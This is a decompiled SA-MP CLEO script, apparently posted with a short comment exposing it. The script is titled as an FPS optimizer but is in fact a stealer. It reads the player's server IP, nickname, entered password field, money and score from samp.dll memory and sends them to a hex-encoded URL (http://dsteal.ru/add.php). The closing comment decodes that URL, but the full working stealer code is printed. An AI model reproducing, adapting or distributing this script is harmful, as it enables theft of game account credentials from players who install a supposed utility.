fpstoptimizator by cocuka
SOURCE
| // This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013 {$CLEO .cs} //-------------MAIN--------------- 0000: NOP wait 0 call @Noname_1646 0 call @Noname_1506 1 -38 jump @Noname_1838 :Noname_38 wait 0 0AA2: 31@ = load_library "kernel32.dll" // IF and SET 0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET 0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@ 0A8E: 33@ = 0@ + 47806 // int 0A8D: 32@ = read_memory 33@ size 1 virtual_protect 1 if 32@ == 0 else_jump @Noname_166 0A8E: 3@ = 0@ + 2173568 // int :Noname_166 if 32@ == 64 else_jump @Noname_197 0A8E: 3@ = 0@ + 2173624 // int :Noname_197 0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1 if 2@ > 1000 else_jump @Noname_1108 0A8E: 22@ = 2@ + 985 // int 0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1 if 2@ > 1000 else_jump @Noname_1108 0A8E: 5@ = 23@ + 20 // int 0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1 if 4@ > 1000 else_jump @Noname_1108 0A8E: 5@ = 4@ + 34 // int 0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1 if 24@ > 1000 else_jump @Noname_1108 if 32@ == 0 else_jump @Noname_383 0A8E: 22@ = 0@ + 2173504 // int :Noname_383 if 32@ == 64 else_jump @Noname_414 0A8E: 22@ = 0@ + 2173560 // int :Noname_414 0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1 if 1@ > 1000 else_jump @Noname_1108 0A8E: 7@ = 1@ + 40 // int 0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1 0A8E: 5@ = 1@ + 44 // int 0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1 if 6@ == 1 else_jump @Noname_539 if or 26@ == 1 26@ == 3 else_jump @Noname_539 25@ = 1 :Noname_539 if and 25@ == 1 not 6@ == 1 else_jump @Noname_1108 0A8E: 7@ = 1@ + 48 // int 0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1 0A8E: 6@ = 1@ + 36 // int 0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1 if 32@ == 0 else_jump @Noname_639 0A8E: 6@ = 0@ + 617008 // int :Noname_639 if 32@ == 64 else_jump @Noname_670 0A8E: 6@ = 0@ + 515232 // int :Noname_670 0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@ 0A8E: 6@ = 4@ + 26 // int 0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1 0A8E: 7@ = 4@ + 10 // int if not 23@ >= 16 else_jump @Noname_751 0085: 12@ = 7@ // (int) jump @Noname_763 :Noname_751 0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1 :Noname_763 wait 100 0A8E: 9@ = 2@ + 710 // int 0A8E: 14@ = 2@ + 452 // int 0A8E: 8@ = 2@ + 969 // int 0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1 0A8E: 18@ = 4@ + 42 // int 0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1 21@ = Player.Money($0[2]) 0AC6: 0@ = label @Noname_1802 offset call @Noname_1115 0 22@ 4@ 25@ 6@ 7@ 8@ 19@ 10@ alloc 20@ 1024 gosub @Noname_1828 alloc 20@ 456 format 20@ "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%d&time=%d:%d&data=%d.%d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@ alloc 8@ 356 format 8@ "" call @Noname_1357 1 8@ 9@ call @Noname_1430 2 9@ 20@ free 8@ free 20@ 25@ = 0 :Noname_1108 jump @Noname_38 :Noname_1115 0AA2: 0@ = load_library "kernel32.dll" // IF and SET 0AA4: 1@ = get_proc_address "GetLocalTime" library 0@ // IF and SET alloc 2@ 32 0AA5: call 1@ num_params 1 pop 0 2@ 0A8D: 3@ = read_memory 2@ size 2 virtual_protect 0 2@ += 2 0A8D: 4@ = read_memory 2@ size 2 virtual_protect 0 2@ += 2 0A8D: 5@ = read_memory 2@ size 2 virtual_protect 0 2@ += 2 0A8D: 6@ = read_memory 2@ size 2 virtual_protect 0 2@ += 2 0A8D: 7@ = read_memory 2@ size 2 virtual_protect 0 2@ += 2 0A8D: 8@ = read_memory 2@ size 2 virtual_protect 0 2@ += 2 0A8D: 9@ = read_memory 2@ size 2 virtual_protect 0 2@ += 2 0A8D: 10@ = read_memory 2@ size 2 virtual_protect 0 2@ -= 30 ret 8 22@ 4@ 25@ 6@ 7@ 8@ 9@ 10@ :Noname_1357 0AA2: 30@ = load_library "Wininet.dll" // IF and SET 0AA4: 29@ = get_proc_address "InternetOpenA" library 30@ // IF and SET 0AA7: call_function 29@ num_params 5 pop 0 0 0 0 0 0@ 1@ ret 1 1@ :Noname_1430 0AA2: 30@ = load_library "Wininet.dll" // IF and SET 0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@ // IF and SET 0AA7: call_function 29@ num_params 6 pop 0 0 0 0 0 1@ 0@ 2@ ret 0 :Noname_1506 0A9F: 32@ = current_thread_pointer 32@ += 16 0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0 0062: 32@ -= 0@ // (int) 0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@ 005A: 32@ += 0@ // (int) 33@ += 16 0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0 33@ += 44 32@ = 0 :Noname_1597 0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0 33@ += 4 32@ += 1 32@ > 30 else_jump @Noname_1597 ret 0 :Noname_1646 0AA2: 31@ = load_library "kernel32.dll" // IF and SET 0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET 0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@ 0@ += 371500 0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1 0@ += 4 0A8C: write_memory 0@ size 1 value 144 virtual_protect 1 0@ += 9 0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1 0@ += 4 0A8C: write_memory 0@ size 1 value 144 virtual_protect 1 ret 0 :Noname_1802 hex 68 74 74 70 3A 2F 2F 64 73 74 65 61 6C 2E 72 75 2F 61 64 64 2E 70 68 70 3F 00 end :Noname_1828 28@ = 637 return :Noname_1838 end_thread |
hex
68 74 74 70 3A 2F 2F 64 73 74 65 61 6C 2E 72 75
2F 61 64 64 2E 70 68 70 3F 00
end
is
http://dsteal.ru/add.php?
This is where it sends files to
Mr.Ze